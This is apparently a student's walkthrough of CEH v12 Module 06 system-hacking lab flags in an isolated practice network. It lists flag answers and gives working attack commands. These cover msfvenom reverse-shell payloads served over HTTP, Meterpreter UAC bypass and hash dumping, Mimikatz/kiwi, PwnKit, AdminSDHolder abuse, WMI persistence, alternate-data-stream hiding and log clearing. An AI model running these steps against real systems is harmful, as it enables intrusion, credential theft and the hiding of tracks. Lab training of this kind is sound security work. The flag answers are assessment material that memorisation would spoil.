Module 06 - Practical

Those are the steps that I took to complete the flag-hunting session, in the current module of the CEH v12 Practical Course.

Flag 1

Run the Responder tool on the Ubuntu machine and find the NTLM hash for the user Jason on Windows 11. Simulate the user Jason (user: Jason and password: qwerty) on the Windows 11 machine. Enter the option that specifies the interface while running the Responder tool.

A: -I

Flag 2

Run L0phtCrack on the Windows 11 machine. You have the admin credentials (username: Administrator, password: Pa$$w0rd) of a target machine, which is at 10.10.1.22. Find the password of another user, Martin, on the machine at 10.10.1.22.

Launch L0phtCrack and follow these steps: Windows > A remote Machine > {Host: 10.10.1.22} {Username: Administrator} {Password: Pa$$w0rd} > Thorough Password Audit > Generate Report {CSV} > Run this job Immediately

A: apple

Flag 3

Search for the vulnerability "CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)" on exploit-db.com. What is the CVE ID for this vulnerability?

  • Browser: exploit-db.com

  • Browser: Search for > CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)

A: 2018-6892

Flag 4

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Run the Armitage tool from the attacker’s machine to exploit vulnerabilities on the target system. Interact with the target system and use the sysinfo command to find the build number of the target’s operating system.

Parrot Terminal
service postgresql start

You have to start a database to make Armitage works

  • Execute Application > Pentesting > Exploitation Tools > Metasploit Framework > Armitage

Metasploit Server information, to use it too

Armitage
Select meterpreter_reverse_tcp

add the following information to send the exploit.

  • Open the target machine and execute the exploit

  • Armitage: Open the shell and execute sysinfo

A: 22000

Flag 5

Use the Ninja Jonin to gain access to the Windows Server 2022. Enter the name of the Windows Server machine that is captured in the Jonin console.

From the Free Trial Version of Ninja&Jonin, you have to change the HOST at constants.json

  • Open Jonin.win.exe with the attacker machine

  • Open Ninja.win.exe with the target

  • Now, with the attacker terminal, type List

This tool is excessively manual, so there is no point of using it usually

A: Server22

Flag 6

Use the Ninja Jonin to gain access to the Windows Server 2022. Enter the command that should be used to open shell on the target machine, using Jonin console.

Image from the documentation, the command that you need to execute after connect 1 is cmd

A: cmd

Flag 7

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Execute and exploit a vulnerable application, D:\CEH-Tools\CEHv11 Module 06 System Hacking\Buffer Overflow Tools\vulnserver\vulnserver.exe, to gain admin access to the target machine. Flag submission is not required for this task, enter "No flag" as the answer.

From this task, you must follow the step from Lab 1: Task 7, there are 150 steps in this task.

A: No flag

Flag 8

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Use the msfvenom tool on the attacker’s machine to exploit the target machine and gain SYSTEM-level access. Obtain the password hashes of the users on the target machine 10.10.1.11. Flag submission is not required for this task, enter "No flag" as the answer.

Using your Parrot Machine as root,

Parrot Terminal
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.1.13 -f exe > /home/attacker/Desktop/Exploit.exe

Create a sharing folder and copy the exploit there.

Parrot Terminal
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/

Now open the MSFconsole and change the variables.

Parrot Terminal
msfconsole
set payload windows/meterpreter/reverse_tcp
LHOST 10.10.1.13
exploit -j -z

Open the Windows machine, login, and with your browser go to "http://10.10.1.13/share" and download the file "Exploit.exe", don’t forget to execute it. [Remember to use service apache2 start to share the file from Parrot to Windows]

Now return to your Parrot machine, it detects a session, now you want to activate it.

Meterpreter
session -i 1
get uid

Here, we are going to use a tool provided by EC-Council, at your parrot machine, copy and paste BeRoot at your desktop (Location: CEHv12 Module 06 System Hacking\Privilege Escalation Tools, but first you have to go to smb://10.10.1.11 using the Windows' credentials)

Meterpreter
upload /home/attacker/Desktop/BeRoot/beRoot.exe
shell
Meterpreter
beRoot.exe
exit

Now we will go further with another tool.

Meterpreter
use exploit/windows/local/bypassuac_fodhelper
show options
set SESSION 1
set payload windows/meterpreter/reverse_tcp
show options               # To check the information
set LHOST 10.10.1.13
set TARGET 0
exploit
getsystem -t 1
getuid # Check more information
run post/windows/gather/smart_hashdump

A: No flag

Flag 9

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Use the msfvenom tool on the attacker’s machine to create a backdoor and exploit the target machine to gain an MSF interactive shell. Find the number of interfaces on the target machine.

Same steps as before, and the same exploit (this time called Backdoor.exe), but at the first msfconsole you use " set payload windows/meterpreter/reverse_tcp " and you use the command ipconfig at the end.

A: 2

Flag 10

Use a proof-of-concept code to execute the attack on the Parrot Security machine and escalate the privileges from a standard user to a root user. Flag submission is not required for this task, enter "No flag" as the answer.

Here, we are going to use an specific exploit, pkexec CVE-2021-4034

Parrot Terminal
mkdir /tmp/pwnkit
cd /tmp/pwnkit/CVE-2021-4034
make
./cve-2021-4034
Parrot Terminal
./cve-2021-4034

And done, you exploited yourself. Jokes aside, is a good tool if you manage to execute the exploit as a user inside a linux machine.

A: No Flag

Flag 11

Exploit misconfigured NFS to gain access and to escalate previleges on Ubuntu machine. Enter the command that was used to check if any share is available for mount in Ubuntu machine.

This is a question from the LAB 2 – task 4. After discovering the port 2049 (nsf_acl) with Nmap and install a tool with sudo apt-get install nsf-common. You prepare a linked folder for further uses.

A: showmount -e 10.10.1.9

Flag 12

Exploit misconfigured NFS to gain access and to escalate previleges on Ubuntu machine. What is the command that is used to view current processes along with their PIDs?

This is a question from the LAB 2 – task 4. It is extremely important to know about this, it will helps you a lot to solve machines.

A: ps -ef

Flag 13

Exploit Sticky keys feature to gain access and to escalate previleges on the Windows 11 machine. Enter the domain of Windows 11 obtained from sysinfo command in meterpreter session.

Same information as previous Metepreter exploits, and here we are going to use a lot of Meterpreter, I will create a block for "Classic Meterpreter"

------ START OF CLASSIC METERPRETER -----

Parrot Terminal
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=444 -f exe > /home/attacker/Desktop/Exploit.exe

Create a sharing folder and copy the exploit there.

Parrot Terminal
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/
service apache2 start

Now open the MSFconsole and change the variables.

Parrot Terminal
msfconsole
set payload windows/meterpreter/reverse_tcp
LHOST 10.10.1.13
LPORT 444
run

Open the Windows machine, login, and with your browser go to "http://10.10.1.13/share" and download the file "Exploit.exe", don’t forget to execute it. [Remember to use service apache2 start to share the file from Parrot to Windows]

------ END OF CLASSIC METERPRETER -----

Meterpreter
sysinfo

A: WORKGROUP

Flag 14

Use Metasploit inbuilt Mimikatz module which is also known as kiwi to dump Hashes from Windows 11 machine. Enter the command that is used to open mimikatz in meterpreter session.

Follow the steps from Classic Meterpreter - Flag 13, then:

Meterpreter
use exploit/windows/local/bypassauc_fodhelper
set session 1

Check what variables need to be filled with show options, like set TARGET 0

Meterpreter
exploit
get system -t 1
load kiwi

A: load kiwi

Flag 15

Use the Power Spy tool on the Windows Server 2022 machine to monitor the target machine at 10.10.1.19. Use the user account Jason, with the password qwerty, to establish a Remote Desktop Connection with the target system. What is the default key combination to put Power Spy in the Stealth mode?

From the LAB 3 – TASK 1, at the step 33.

I don’t like this tool, so if someone want to add steps here, it is open, send me an email I will add the information here (Remember to add your webpage or LinkedIn to give the proper credits)

A: Ctrl+Alt+X

Flag 16

Use the Spytech SpyAgent tool on the Windows Server 2022 machine to monitor the target machine at 10.10.1.19. Use the user account Jason, with the password qwerty, to establish a Remote Desktop Connection with the target system. Which option will enable you to configure SpyTech Spy Agent to run in the total stealth mode, with all possible logging options preconfigured?

From the LAB 3 – TASK 2, at the step 23.

I don’t like this tool.

A: Complete + Stealth Configuration

Flag 17

In the Windows Server 2019 machine, use NTFS Streams to hide calc.exe inside the readme.txt file. Flag submission is not required for this task, enter "No flag" as the answer.

Using your Windows Machine, login, and go to the folder C:\magic, copy and paste there the file C:\Windows\System32\calc.exe and create a file called readme.txt with anything as a content.

Windows Terminal
cd C:\magic
Windows Terminal
type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
mklink backdoor.exe readme.txt:calc.exe

A: No flag

Flag 18

On the Windows 11 machine, hide data into a text file using the whitespace steganography tool Snow. Flag submission is not required for this task, enter "No flag" as the answer.

Using your Windows Machine, login, and go to the folder" E:\CEH-Tools\CEHv12 Module 06 System Hacking\Steganography Tools\Whitespace Steganography Tools" and paste the folder "Snow" in the Desktop. And create a readme.txt with anything inside.

Windows Terminal
cd C:\Users\Admin\Desktop\Snow
snow -C -m "Real Sensitive Information" -p "magic" readme.txt readme2.txt

And done, now readme.txt is encrypted as readme2.txt, it will show the original content from readme.txt, and will hide the Sensitive Information, to see the content, type: snow -C -p "magic" readme2.txt

A: No flag

Flag 19

On the Windows Server 2019 machine, hide text inside an image using the OpenStego tool. Flag submission is not required for this task, enter "No flag" as the answer.

  • Using the Windows Machine, execute OpenStego

  • At Message File, add a file with any message.

  • At Cover File, upload any image

  • At Output, add a path and the result name

A: No Flag

Flag 20

Exploit a misconfigured startup folder to gain privileged access and persistence on the Windows 11 machine. What is the command used in this task to elevate previleges in this task?

This task is about using Metasploit + GhostPack Seabelt, from the Module 06, Lab 2, Task 1.

A: getsystem -t 1

Flag 21

Exploit Active Directory Objects and adding Martin a standard user in Windows Server 2022, to Domain Admins group through AdminSDHolder. Enter the name of the user that is added into Domain Admins group in this task.

Using your parrot machine, create a malicious file with msfvenom

------ START OF CLASSIC METERPRETER -----

Parrot Terminal
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Exploit.exe

Create a sharing folder and copy the exploit there.

Parrot Terminal
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/
service apache2 start

Now open the MSFconsole and change the variables.

Meterpreter
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
LHOST 10.10.1.13
LPORT 444
run

Open the Windows machine, login, and with your browser go to "http://10.10.1.13/share" and download the file "Exploit.exe", don’t forget to execute it. [Remember to use service apache2 start to share the file from Parrot to Windows]

------ END OF CLASSIC METERPRETER -----

Meterpreter
getuid # Check information
upload -r /home/attacker/PowerTools-master C:\\Users\\Administrator\\Downloads
shell
cd C:\Windows\System32
powershell

With powershell activated, we can do whatever we want, in this case, add Martin with permission.

Meterpreter
cd C:\Users\Administrator\Downloads\PowerView
Import-Module ./powerview.psm1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName Martin -Verbose -Rights All
Get-ObjectAcl -SamAccountName "Martin” -ResolveGUIDs

In this case, he is just a GenericAll.

A: Martin

Flag 22

Exploit WMI event subscription to gain persistent access to the Windows 11 machine. Enter the server username that is acquired after exploiting the WMI event subscription.

Using your parrot machine, create 2 malicious files by using Metasploit.

------ START OF CLASSIC METERPRETER -----

Parrot Terminal
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Payload.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/wmi.exe

Create a sharing folder and copy the exploit there.

Parrot Terminal
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Payload.exe /var/www/html/share/
cp /home/attacker/Desktop/wmi.exe /var/www/html/share/
service apache2 start

Now open the MSFconsole and change the variables.

Meterpreter
msfconsole
set payload windows/meterpreter/reverse_tcp
LHOST 10.10.1.13
LPORT 444
run

Open the Windows machine, login, and with your browser go to "http://10.10.1.13/share" and download the file "Exploit.exe", don’t forget to execute it. [Remember to use service apache2 start to share the file from Parrot to Windows]

------ END OF CLASSIC METERPRETER -----

Meterpreter
getuid
upload /home/attacker/Wmi-Persistence-master C:\\Users\\Administrator\\Downloads
load powershell
Import-Module ./WMI-Persistence.ps1
Install-Persistence -Trigger Startup -Payload “C:\Users\Administrator\Downloads\wmi.exe”

Now open a new Parrot Terminal

Parrot Terminal
Msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
lhost 10.10.1.13
lport 444
exploit

From the last command, you get the answer.

A: NT AUTHORITY\SYSTEM

Flag 23

From the Parrot Security machine, navigate to CEHv12 Module 06 System Hacking\Covering Tracks Tools\Covert_TCP on the machine at 10.10.1.11 and copy the file covert_tcp.c. Compile the code in covert_tcp.c to create a covert TCP channel between the Parrot Security machine (10.10.1.13) and the Ubuntu machine at 10.10.1.9. For the Windows 11 machine, the username is Admin, and the password is Pa$$w0rd. Flag submission is not required for this task, enter "No flag" as the answer.

This program is used to send a message through TCP, you can read it by using wireshark. I don’t find this useful

A: No flag

Flag 24

On the Windows 11 machine, use Auditpol to enable or disable security auditing on local or remote systems and to adjust the audit criteria for different categories of security events. Which command is used to clear the audit policies?

Auditpol.exe is the command-line utility tool to change the Audit Security settings at the category and sub-category levels. You can use Auditpol to enable or disable security auditing on local or remote systems and to adjust the audit criteria for different categories of security events.

In the second module, lab 4, task 1, they use auditpol /clear /y to clear the audit policies

A: auditpol /clear /y

Flag 25

In the Windows 11 machine, use various Windows utilities such as Clear_Event_Viewer_Logs.bat, wevtutil, and Cipher to clear system logs. Which wevtutil command will clear all system logs (enter the complete command as the answer)?

The system log file contains events that are logged by the OS components. These events are often predetermined by the OS itself. System log files may contain information about device changes, device drivers, system changes, events, operations, and other changes.

There are various Windows utilities that can be used to clear system logs such as Clear_Event_Viewer_Logs.bat, wevtutil, and Cipher. Here, we will use these utilities to clear the Windows machine logs.

This is a theorical question from the module 06 - lab 4 - task 2 about the command used at the window machine to clear the system log.

A: wevtutil cl system

Flag 26

In the Parrot Security machine, clear the Linux machine event logs using the Bash shell. Which command will disable the Bash shell from saving the history?

The same as the previous question, but with LINUX. Here is a lot easier to complete the task, you can configure the history size to remove every saved command and delete the further ones.

You can use history -c to check.

A: export HISTSIZE=0

Flag 27

Use various commands to hide file in Windows and Linux machines. Enter the name of the user that is added in Windows 11 machine in this task.

Here they use many generic commands, is not worth learning about them.

In Windows, you hide a folder by changing the attributes.

Windows Terminal
attrib +h +s +r Test
attrib -h -s -r Test        # To remove

# You can do something similar with net users.
net user Test /active:yes
net user Test /active:no   # To remove

A: Test

Flag 28

Use various commands to hide file in Windows and Linux machines. Enter the name of the text file that is hidden in Parrot Security machine in this task.

Just add a dot at the beginning of the file.

Parrot Terminal
touch .Secret.txt

A: Secret.txt

Flag 29

In the Windows 11 machine, use the CCleaner tool located at E:\CEH-Tools\CEHv12 Module 06 System Hacking\Covering Tracks Tools\CCleaner to remove unused files and traces of Internet browsing details. Flag submission is not required for this task, enter "No flag" as the answer.

Ok, this is just executing CCleaner, there is no mystery here.

A: No flag

PreviousModule 06 - SummaryNextNetwork Security & Database Vulnerabilities

Last updated